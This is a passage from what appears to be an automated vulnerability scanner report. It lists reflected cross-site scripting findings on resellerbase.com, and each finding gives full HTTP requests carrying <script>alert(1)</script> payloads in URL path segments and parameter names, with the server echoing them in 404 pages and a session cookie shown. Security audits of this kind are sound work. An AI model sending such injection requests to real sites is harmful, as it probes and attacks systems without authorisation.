<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes89d57<script>alert(1)</script>a8bb4890495/kosmos/ was not found on this server.</p>
...[SNIP]...

2.4984. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f348e<script>alert(1)</script>8d375614a1f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmosf348e<script>alert(1)</script>8d375614a1f/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmosf348e<script>alert(1)</script>8d375614a1f/ was not found on this server.</p>
...[SNIP]...

2.4985. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bbb84<script>alert(1)</script>c5a14f7bf1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/?bbb84<script>alert(1)</script>c5a14f7bf1b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/?bbb84<script>alert(1)</script>c5a14f7bf1b=1 was not found on this server.</p>
...[SNIP]...

2.4986. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8873a<script>alert(1)</script>4fb9acd74a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service8873a<script>alert(1)</script>4fb9acd74a0/domain-names/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service8873a<script>alert(1)</script>4fb9acd74a0/domain-names/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.4987. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a462<script>alert(1)</script>1eae58848c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names4a462<script>alert(1)</script>1eae58848c1/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names4a462<script>alert(1)</script>1eae58848c1/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.4988. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 78c95<script>alert(1)</script>ce751d897c3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes78c95<script>alert(1)</script>ce751d897c3/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes78c95<script>alert(1)</script>ce751d897c3/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.4989. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1fe28<script>alert(1)</script>d72b927ebaa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos1fe28<script>alert(1)</script>d72b927ebaa/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos1fe28<script>alert(1)</script>d72b927ebaa/images/ was not found on this server.</p>
...[SNIP]...

2.4990. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fd00d<script>alert(1)</script>9e84e8c28a5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/imagesfd00d<script>alert(1)</script>9e84e8c28a5/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/imagesfd00d<script>alert(1)</script>9e84e8c28a5/ was not found on this server.</p>
...[SNIP]...

2.4991. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4ba89<script>alert(1)</script>3cf4e1215f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/?4ba89<script>alert(1)</script>3cf4e1215f7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/?4ba89<script>alert(1)</script>3cf4e1215f7=1 was not found on this server.</p>
...[SNIP]...

2.4992. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/folder.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c27c7<script>alert(1)</script>b9f02130e1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicec27c7<script>alert(1)</script>b9f02130e1d/domain-names/themes/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicec27c7<script>alert(1)</script>b9f02130e1d/domain-names/themes/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.4993. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/folder.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a190b<script>alert(1)</script>6982e2faf7b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-namesa190b<script>alert(1)</script>6982e2faf7b/themes/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-namesa190b<script>alert(1)</script>6982e2faf7b/themes/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.4994. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/folder.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6e28c<script>alert(1)</script>a027002a2f0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes6e28c<script>alert(1)</script>a027002a2f0/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes6e28c<script>alert(1)</script>a027002a2f0/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.4995. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/folder.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 71176<script>alert(1)</script>2974f9248db was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos71176<script>alert(1)</script>2974f9248db/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos71176<script>alert(1)</script>2974f9248db/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.4996. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/folder.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fc452<script>alert(1)</script>6c59bf0e597 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/imagesfc452<script>alert(1)</script>6c59bf0e597/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/imagesfc452<script>alert(1)</script>6c59bf0e597/folder.gif was not found on this server.</p>
...[SNIP]...

2.4997. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/folder.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 7ad62<script>alert(1)</script>80e921a4a48 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/folder.gif7ad62<script>alert(1)</script>80e921a4a48 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/folder.gif7ad62<script>alert(1)</script>80e921a4a48 was not found on this server.</p>
...[SNIP]...

2.4998. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/folder.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/folder.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2917c<script>alert(1)</script>17bc6454fe5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/folder.gif?2917c<script>alert(1)</script>17bc6454fe5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/folder.gif?2917c<script>alert(1)</script>17bc6454fe5=1 was not found on this server.</p>
...[SNIP]...

2.4999. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 81172<script>alert(1)</script>14308f892b8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service81172<script>alert(1)</script>14308f892b8/domain-names/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service81172<script>alert(1)</script>14308f892b8/domain-names/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5000. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 63025<script>alert(1)</script>8f3a054a49f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names63025<script>alert(1)</script>8f3a054a49f/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names63025<script>alert(1)</script>8f3a054a49f/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5001. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload aa6c2<script>alert(1)</script>cf979a99ac6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themesaa6c2<script>alert(1)</script>cf979a99ac6/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themesaa6c2<script>alert(1)</script>cf979a99ac6/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5002. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b6ec6<script>alert(1)</script>723d18d6647 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmosb6ec6<script>alert(1)</script>723d18d6647/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmosb6ec6<script>alert(1)</script>723d18d6647/images/rating/ was not found on this server.</p>
...[SNIP]...

